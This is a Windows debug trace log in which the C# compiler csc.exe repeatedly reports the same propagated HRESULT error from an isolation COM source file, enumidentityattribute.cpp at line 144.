csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144